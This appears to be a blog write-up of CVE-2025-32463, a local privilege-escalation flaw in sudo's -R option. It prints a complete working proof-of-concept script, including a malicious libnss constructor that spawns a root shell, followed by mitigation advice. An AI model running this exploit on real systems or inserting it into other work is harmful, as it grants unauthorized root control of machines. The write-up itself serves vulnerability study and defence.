CVE

CVE-2025-32463: Sudo Local Privilege Escalation

Jul 17, 2025 • ★★★★☆ • 3 min

On this page

Sudo 1.9.16p2 – CVE-2025-32463 Local Privilege Escalation Exploit
Vulnerability Summary
Target Environment
How the Exploit Works
1. libnss Manipulation
2. Execution via constructor
3. Triggering with sudo -R
Exploit Code
Proof of Concept
Technical Details
Mitigation
References
Conclusion

Sudo 1.9.16p2 – CVE-2025-32463 Local Privilege Escalation Exploit

Vulnerability Summary

This write-up walks through exploiting CVE-2025-32463, a local privilege-escalation flaw, using Rich Mirch’s sudo-chwoot.sh PoC. The bug lives in sudo’s -R (alternative root directory) option, which sidesteps several safety checks. By manipulating how libnss is loaded inside an attacker-controlled directory, a low-privileged user can spawn a root shell.

Target Environment

Distribution: Kali Linux 6.12.25

Sudo Version: 1.9.16p2

Security Updates: Disabled

User Privileges: Limited sudo access via -R flag

How the Exploit Works

1. `libnss` Manipulation

When sudo runs, it consults libnss (Name Service Switch) libraries to resolve user information. Normally these load from system paths like /lib/x86_64-linux-gnu/. With sudo -R, the root directory is changed (chroot-like environment) and libnss is then sought relative to that new root.

2. Execution via `constructor`

The exploit produces a shared object named libnss_woot1337.so.2. A constructor function inside it runs automatically the moment the library is loaded:

__attribute__((constructor)) void woot(void) {
  setreuid(0,0);
  setregid(0,0);
  chdir("/");
  execl("/bin/bash", "/bin/bash", NULL);
}

The code raises effective UID/GID to 0 (root) and spawns a shell with root privileges.

3. Triggering with `sudo -R`

sudo -R woot woot

This treats woot as the new root (/) and tries to load libnss_woot1337.so.2 from there. The exploit fires and the user lands in a root shell.

Exploit Code

#!/bin/bash
# CVE-2025-32463 – Sudo EoP Exploit PoC

STAGE=$(mktemp -d /tmp/sudowoot.stage.XXXXXX)
cd ${STAGE?} || exit 1

cat > woot1337.c <<EOF
#include <stdlib.h>
#include <unistd.h>

__attribute__((constructor)) void woot(void) {
  setreuid(0,0);
  setregid(0,0);
  chdir("/");
  execl("/bin/bash", "/bin/bash", NULL);
}
EOF

mkdir -p woot/etc libnss_
echo "passwd: /woot1337" > woot/etc/nsswitch.conf
cp /etc/group woot/etc
gcc -shared -fPIC -Wl,-init,woot -o libnss_/woot1337.so.2 woot1337.c

echo "woot!"
sudo -R woot woot
rm -rf ${STAGE?}

Proof of Concept

Running the script drops us into a shell, and id confirms root privileges.

Technical Details

While running, sudo loads libnss libraries relative to the root directory (/).
The -R flag points that root at an attacker-controlled directory, allowing custom libraries to be loaded.
Once the library loads, its constructor block runs.
That code spawns a shell with root privileges, handing the user full system control.

Mitigation

Recommendations:

Update sudo to a patched version.
Restrict users from invoking sudo -R (alternative root directory).
Don’t trust external paths during NSS loading; enforce hardened paths and library validation.

References

Conclusion

This vulnerability allows trivial root acquisition by abusing system configuration weaknesses. Lack of proper isolation around core components like libnss and missing safeguards around sudo -R together produced this gap. System administrators should carefully scope user privileges and routinely audit sudo configurations.